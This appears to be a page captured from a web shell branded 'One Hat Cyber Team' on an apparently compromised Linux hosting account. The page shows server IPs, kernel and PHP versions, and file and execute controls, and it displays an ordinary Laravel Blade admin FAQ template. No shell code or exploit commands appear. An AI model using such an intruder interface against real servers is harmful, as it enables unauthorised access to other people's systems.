⚝
One Hat Cyber Team
⚝
Your IP:
3.142.245.16
Server IP:
162.254.39.145
Server:
Linux premium289.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
favoaysf
/
www
/
resources
/
views
/
back
/
faq
/
View File Name :
index.blade.php
@extends('master.back') @section('content') <!-- Start of Main Content --> <div class="container-fluid"> <!-- Page Heading --> <div class="card mb-4"> <div class="card-body"> <div class="d-sm-flex align-items-center justify-content-between"> <h3 class="mb-0 pl-3"><b>{{ __('FAQ Contents') }}</b> </h3> <a class="btn btn-primary btn-sm" href="{{route('back.faq.create')}}"><i class="fas fa-plus"></i> {{ __('Add') }}</a> </div> </div> </div> <!-- DataTales --> <div class="card shadow mb-4"> <div class="card-body"> @include('alerts.alerts') <div class="table-responsive"> <table class="table table-bordered table-striped" id="admin-table" width="100%" cellspacing="0"> <thead> <tr> <th width="20%">{{ __('Title') }}</th> <th width="20%">{{ __('Category') }}</th> <th width="45%">{{ __('Details') }}</th> <th width="15%">{{ __('Actions') }}</th> </tr> </thead> <tbody> @include('back.faq.table',compact('datas')) </tbody> </table> </div> </div> </div> </div> </div> <!-- End of Main Content --> {{-- DELETE MODAL --}} <div class="modal fade" id="confirm-delete" tabindex="-1" role="dialog" aria-labelledby="confirm-deleteModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <!-- Modal Header --> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">{{ __('Confirm Delete?') }}</h5> <button class="close" type="button" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <!-- Modal Body --> <div class="modal-body"> {{ __('You are going to delete this FAQ. All contents related with this FAQ will be lost.') }} {{ __('Do you want to delete it?') }} </div> <!-- Modal footer --> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">{{ __('Cancel') }}</button> <form action="" class="d-inline btn-ok" method="POST"> @csrf @method('DELETE') <button type="submit" class="btn btn-danger">{{ __('Delete') }}</button> </form> </div> </div> </div> </div> {{-- DELETE MODAL ENDS --}} @endsection